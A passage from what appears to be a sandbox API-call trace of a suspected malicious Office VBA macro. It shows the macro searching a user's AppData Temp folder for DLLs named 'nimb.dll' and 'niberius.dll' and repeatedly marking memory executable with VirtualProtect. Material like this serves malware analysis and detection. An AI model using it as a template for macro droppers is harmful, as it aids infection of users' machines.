bstrLeft="c:\\users\\keecfmwgj\\appdata\\roa", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaLocal\\Temp", lpUsedDefaultChar=0x0) returned 41 [0161.310] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roaLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roaLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roaLocal\\Temp" [0161.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roaLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roaLocal\\Temp", lpUsedDefaultChar=0x0) returned 41 [0161.310] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roaLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.310] _errno () returned 0x77207d8 [0161.310] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.310] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.310] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.311] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\ro", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roLocal\\Temp", lpUsedDefaultChar=0x0) returned 40 [0161.311] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\roLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\roLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\roLocal\\Temp" [0161.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\roLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\roLocal\\Temp", lpUsedDefaultChar=0x0) returned 40 [0161.311] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\roLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.311] _errno () returned 0x77207d8 [0161.311] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.311] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.311] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.311] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\r", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\rLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\rLocal\\Temp", lpUsedDefaultChar=0x0) returned 39 [0161.311] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\rLocal\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\rLocal\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\rLocal\\Temp" [0161.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\rLocal\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\rLocal\\Temp", lpUsedDefaultChar=0x0) returned 39 [0161.312] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\rLocal\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0xffffffff [0161.312] _errno () returned 0x77207d8 [0161.312] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.312] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.312] VarSub (in: pvarLeft=0x187ee4, pvarRight=0x187ed4, pvarResult=0x187eb4 | out: pvarResult=0x187eb4) returned 0x0 [0161.312] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\", bstrRight="Local\\Temp", pbstrResult=0x187e50 | out: pbstrResult=0x187e50) returned 0x0 [0161.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x1878bc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\Local\\Temp", lpUsedDefaultChar=0x0) returned 38 [0161.312] _fullpath (in: _FullPath=0x187c48, _Path="c:\\users\\keecfmwgj\\appdata\\Local\\Temp", _SizeInBytes=0x104 | out: _FullPath="c:\\users\\keecfmwgj\\appdata\\Local\\Temp") returned="c:\\users\\keecfmwgj\\appdata\\Local\\Temp" [0161.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c:\\users\\keecfmwgj\\appdata\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x187d50, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\users\\keecfmwgj\\appdata\\Local\\Temp", lpUsedDefaultChar=0x0) returned 38 [0161.312] _findfirst32 (in: _FileName="c:\\users\\keecfmwgj\\appdata\\Local\\Temp", _FindData=0x187a28 | out: _FindData=0x187a28) returned 0x7c8d578 [0161.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x187a3c, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0161.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x187a3c, cbMultiByte=-1, lpWideCharStr=0x7df013c, cchWideChar=5 | out: lpWideCharStr="Temp") returned 5 [0161.313] VarBstrCmp (bstrLeft="Temp", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x2 [0161.313] VarCmp (pvarLeft=0x187ec4, pvarRight=0x187ed4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0161.314] VarBstrCat (in: bstrLeft="c:\\users\\keecfmwgj\\appdata\\", bstrRight="Local\\Temp", pbstrResult=0x187e54 | out: pbstrResult=0x187e54) returned 0x0 [0161.314] CRetailMalloc_Realloc () returned 0x6d83e28 [0161.314] CRetailMalloc_Alloc () returned 0x7fbadf8 [0161.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672a1a, cbMultiByte=17, lpWideCharStr=0x187418, cchWideChar=18 | out: lpWideCharStr="FileSystemObject") returned 17 [0161.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672a1a, cbMultiByte=17, lpWideCharStr=0x187418, cchWideChar=18 | out: lpWideCharStr="FileSystemObject") returned 17 [0161.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672a1a, cbMultiByte=17, lpWideCharStr=0x187418, cchWideChar=18 | out: lpWideCharStr="FileSystemObject") returned 17 [0161.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672a1a, cbMultiByte=17, lpWideCharStr=0x187418, cchWideChar=18 | out: lpWideCharStr="FileSystemObject") returned 17 [0161.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672a6e, cbMultiByte=5, lpWideCharStr=0x187418, cchWideChar=6 | out: lpWideCharStr="File") returned 5 [0161.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672a6e, cbMultiByte=5, lpWideCharStr=0x187418, cchWideChar=6 | out: lpWideCharStr="File") returned 5 [0161.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672a6e, cbMultiByte=5, lpWideCharStr=0x187418, cchWideChar=6 | out: lpWideCharStr="File") returned 5 [0161.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672a6e, cbMultiByte=5, lpWideCharStr=0x187418, cchWideChar=6 | out: lpWideCharStr="File") returned 5 [0161.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672a6e, cbMultiByte=5, lpWideCharStr=0x187418, cchWideChar=6 | out: lpWideCharStr="File") returned 5 [0161.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672b16, cbMultiByte=7, lpWideCharStr=0x187418, cchWideChar=8 | out: lpWideCharStr="Folder") returned 7 [0161.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672b16, cbMultiByte=7, lpWideCharStr=0x187418, cchWideChar=8 | out: lpWideCharStr="Folder") returned 7 [0161.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672b16, cbMultiByte=7, lpWideCharStr=0x187418, cchWideChar=8 | out: lpWideCharStr="Folder") returned 7 [0161.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672b16, cbMultiByte=7, lpWideCharStr=0x187418, cchWideChar=8 | out: lpWideCharStr="Folder") returned 7 [0161.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672b16, cbMultiByte=7, lpWideCharStr=0x187418, cchWideChar=8 | out: lpWideCharStr="Folder") returned 7 [0161.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672a1a, cbMultiByte=17, lpWideCharStr=0x187564, cchWideChar=18 | out: lpWideCharStr="FileSystemObject") returned 17 [0161.319] CRetailMalloc_Alloc () returned 0x7c8a788 [0161.319] CRetailMalloc_Realloc () returned 0x7f81f60 [0161.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672b86, cbMultiByte=10, lpWideCharStr=0x1875dc, cchWideChar=11 | out: lpWideCharStr="GetFolder") returned 10 [0161.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x49d2986, cbMultiByte=7, lpWideCharStr=0x1875a4, cchWideChar=8 | out: lpWideCharStr="Search") returned 7 [0161.322] CRetailMalloc_Realloc () returned 0x7fbadf8 [0161.322] CRetailMalloc_Free () returned 0x1320001 [0161.322] GetCurrentProcess () returned 0xffffffff [0161.323] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a5d4, dwSize=0x14) returned 1 [0161.323] VirtualProtect (in: lpAddress=0x7d6a5d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1874cc | out: lpflOldProtect=0x1874cc*=0x40) returned 1 [0161.323] GetCurrentProcess () returned 0xffffffff [0161.323] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a5d5, dwSize=0x2) returned 1 [0161.324] GetCurrentProcess () returned 0xffffffff [0161.324] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a5f4, dwSize=0x14) returned 1 [0161.324] VirtualProtect (in: lpAddress=0x7d6a5f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1874cc | out: lpflOldProtect=0x1874cc*=0x40) returned 1 [0161.324] GetCurrentProcess () returned 0xffffffff [0161.324] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a5f5, dwSize=0x2) returned 1 [0161.324] GetCurrentProcess () returned 0xffffffff [0161.324] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a614, dwSize=0x14) returned 1 [0161.324] VirtualProtect (in: lpAddress=0x7d6a614, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1874cc | out: lpflOldProtect=0x1874cc*=0x40) returned 1 [0161.325] GetCurrentProcess () returned 0xffffffff [0161.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a615, dwSize=0x2) returned 1 [0161.325] GetCurrentProcess () returned 0xffffffff [0161.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a634, dwSize=0x14) returned 1 [0161.325] VirtualProtect (in: lpAddress=0x7d6a634, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1874cc | out: lpflOldProtect=0x1874cc*=0x40) returned 1 [0161.326] GetCurrentProcess () returned 0xffffffff [0161.326] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7d6a635, dwSize=0x2) returned 1 [0161.328] GetAsyncKeyState (vKey=3) returned 0 [0161.328] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0161.352] CRetailMalloc_Alloc () returned 0x7fbae90 [0161.352] CRetailMalloc_Realloc () returned 0x7f94a28 [0161.352] realloc (_Block=0x0, _Size=0x100) returned 0xa4e1f60 [0161.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672e66, cbMultiByte=12, lpWideCharStr=0x1872f8, cchWideChar=11 | out: lpWideCharStr="SubFolders") returned 0 [0161.353] CRetailMalloc_Realloc () returned 0x7e1dc68 [0161.353] wcscpy_s (in: _Destination=0x7e1d754, _SizeInWords=0xb, _Source="SubFolders" | out: _Destination="SubFolders") returned 0x0 [0161.354] CRetailMalloc_Realloc () returned 0x7d91568 [0161.354] realloc (_Block=0x0, _Size=0x60) returned 0xa4e2068 [0161.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672eb2, cbMultiByte=7, lpWideCharStr=0x1872f8, cchWideChar=6 | out: lpWideCharStr="Files") returned 0 [0161.354] wcscpy_s (in: _Destination=0x7e1d770, _SizeInWords=0x6, _Source="Files" | out: _Destination="Files") returned 0x0 [0161.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4671216, cbMultiByte=6, lpWideCharStr=0x1872f8, cchWideChar=5 | out: lpWideCharStr="Name") returned 0 [0161.354] wcscpy_s (in: _Destination=0x7e1d780, _SizeInWords=0x5, _Source="Name" | out: _Destination="Name") returned 0x0 [0161.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d3bcec, cbMultiByte=8, lpWideCharStr=0x5cb0c30, cchWideChar=18 | out: lpWideCharStr="nimb.dll") returned 8 [0161.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672efe, cbMultiByte=4, lpWideCharStr=0x187544, cchWideChar=5 | out: lpWideCharStr="Err") returned 4 [0161.356] CRetailMalloc_Alloc () returned 0x7e8e4c0 [0161.356] CRetailMalloc_Realloc () returned 0x7e07758 [0161.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4672f1e, cbMultiByte=6, lpWideCharStr=0x18751c, cchWideChar=7 | out: lpWideCharStr="Clear") returned 6 [0161.357] CRetailMalloc_Realloc () returned 0x7df4548 [0161.357] CRetailMalloc_Alloc () returned 0x7fbb6a0 [0161.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7555ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0161.357] CRetailMalloc_Realloc () returned 0x7fbae90 [0161.357] CRetailMalloc_Free () returned 0x14a0001 [0161.358] GetCurrentProcess () returned 0xffffffff [0161.358] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cda2, dwSize=0xc) returned 1 [0161.358] VirtualProtect (in: lpAddress=0x7e1cda2, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x187414 | out: lpflOldProtect=0x187414*=0x40) returned 1 [0161.358] GetCurrentProcess () returned 0xffffffff [0161.358] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cdb6, dwSize=0xc) returned 1 [0161.358] VirtualProtect (in: lpAddress=0x7e1cdb6, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x187414 | out: lpflOldProtect=0x187414*=0x40) returned 1 [0161.359] GetCurrentProcess () returned 0xffffffff [0161.359] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cdca, dwSize=0xc) returned 1 [0161.359] VirtualProtect (in: lpAddress=0x7e1cdca, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x187414 | out: lpflOldProtect=0x187414*=0x40) returned 1 [0161.360] GetCurrentProcess () returned 0xffffffff [0161.360] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cdde, dwSize=0xc) returned 1 [0161.360] VirtualProtect (in: lpAddress=0x7e1cdde, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x187414 | out: lpflOldProtect=0x187414*=0x40) returned 1 [0161.360] SetErrorMode (uMode=0x8001) returned 0x8001 [0161.360] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0161.360] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x75320000 [0161.361] SetErrorMode (uMode=0x8001) returned 0x8001 [0161.362] GetProcAddress (hModule=0x75320000, lpProcName=0x2ad) returned 0x753cc02a [0161.362] GetAsyncKeyState (vKey=3) returned 0 [0161.367] VarCmp (pvarLeft=0x187b68, pvarRight=0x187b34, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.369] VarCmp (pvarLeft=0x187b68, pvarRight=0x187b34, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.379] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.380] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.381] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.382] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.383] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.395] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.396] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.397] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.398] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.399] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.400] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.401] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.402] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.403] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.404] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.405] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.405] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.406] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.407] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.408] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.409] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.410] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.411] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.412] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.413] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0161.415] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0161.416] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0161.417] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0161.418] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.419] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.420] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.420] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0161.421] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.422] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.423] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x0 [0161.425] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0161.426] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0161.427] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0161.428] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0161.429] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0161.430] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0161.431] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0161.432] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0161.433] VarCmp (pvarLeft=0x187d30, pvarRight=0x187cfc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0161.434] CRetailMalloc_Alloc () returned 0x7fbb838 [0161.434] _mbscpy_s (in: _Dst=0x1878f0, _DstSizeInBytes=0x4, _Src=0x4672dde | out: _Dst=0x1878f0) returned 0x0 [0161.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d3bc24, cbMultiByte=1, lpWideCharStr=0x5cb0150, cchWideChar=4 | out: lpWideCharStr="\\") returned 1 [0161.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d3bc2a, cbMultiByte=8, lpWideCharStr=0x5cb0190, cchWideChar=18 | out: lpWideCharStr="niberius") returned 8 [0161.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d3bc38, cbMultiByte=4, lpWideCharStr=0x5cb0216, cchWideChar=10 | out: lpWideCharStr=".dll") returned 4 [0161.436] CRetailMalloc_Realloc () returned 0x7fbb838 [0161.436] CRetailMalloc_Free () returned 0xba0001 [0161.436] GetCurrentProcess () returned 0xffffffff [0161.436] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cda2, dwSize=0xc) returned 1 [0161.436] VirtualProtect (in: lpAddress=0x7e1cda2, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x1876d4 | out: lpflOldProtect=0x1876d4*=0x40) returned 1 [0161.436] GetCurrentProcess () returned 0xffffffff [0161.436] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cdb6, dwSize=0xc) returned 1 [0161.436] VirtualProtect (in: lpAddress=0x7e1cdb6, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x1876d4 | out: lpflOldProtect=0x1876d4*=0x40) returned 1 [0161.437] GetCurrentProcess () returned 0xffffffff [0161.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cdca, dwSize=0xc) returned 1 [0161.437] VirtualProtect (in: lpAddress=0x7e1cdca, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x1876d4 | out: lpflOldProtect=0x1876d4*=0x40) returned 1 [0161.438] GetCurrentProcess () returned 0xffffffff [0161.438] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cdde, dwSize=0xc) returned 1 [0161.438] VirtualProtect (in: lpAddress=0x7e1cdde, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x1876d4 | out: lpflOldProtect=0x1876d4*=0x40) returned 1 [0161.439] GetAsyncKeyState (vKey=3) returned 0 [0161.439] CRetailMalloc_Alloc () returned 0x7fbb8d0 [0161.439] CRetailMalloc_Realloc () returned 0x6d84e30 [0161.439] CRetailMalloc_Realloc () returned 0x7f60fd8 [0161.439] CRetailMalloc_Realloc () returned 0x7f6e988 [0161.441] CRetailMalloc_Realloc () returned 0x7fbb8d0 [0161.441] CRetailMalloc_Free () returned 0xf20001 [0161.441] GetCurrentProcess () returned 0xffffffff [0161.442] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cda2, dwSize=0xc) returned 1 [0161.442] VirtualProtect (in: lpAddress=0x7e1cda2, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x1875f4 | out: lpflOldProtect=0x1875f4*=0x40) returned 1 [0161.442] GetCurrentProcess () returned 0xffffffff [0161.442] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cdb6, dwSize=0xc) returned 1 [0161.442] VirtualProtect (in: lpAddress=0x7e1cdb6, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x1875f4 | out: lpflOldProtect=0x1875f4*=0x40) returned 1 [0161.443] GetCurrentProcess () returned 0xffffffff [0161.443] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cdca, dwSize=0xc) returned 1 [0161.443] VirtualProtect (in: lpAddress=0x7e1cdca, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x1875f4 | out: lpflOldProtect=0x1875f4*=0x40) returned 1 [0161.444] GetCurrentProcess () returned 0xffffffff [0161.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cdde, dwSize=0xc) returned 1 [0161.444] VirtualProtect (in: lpAddress=0x7e1cdde, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x1875f4 | out: lpflOldProtect=0x1875f4*=0x40) returned 1 [0161.445] GetAsyncKeyState (vKey=3) returned 0 [0161.445] CRetailMalloc_Alloc () returned 0x7fbb958 [0161.446] CRetailMalloc_Realloc () returned 0x7fbb958 [0161.446] CRetailMalloc_Free () returned 0x1820001 [0161.446] GetCurrentProcess () returned 0xffffffff [0161.446] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7e1cda2, dwSize=0xc) returned 1 [0161.446] VirtualProtect (in: lpAddress=0x7e1cda2, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x187554 | out: 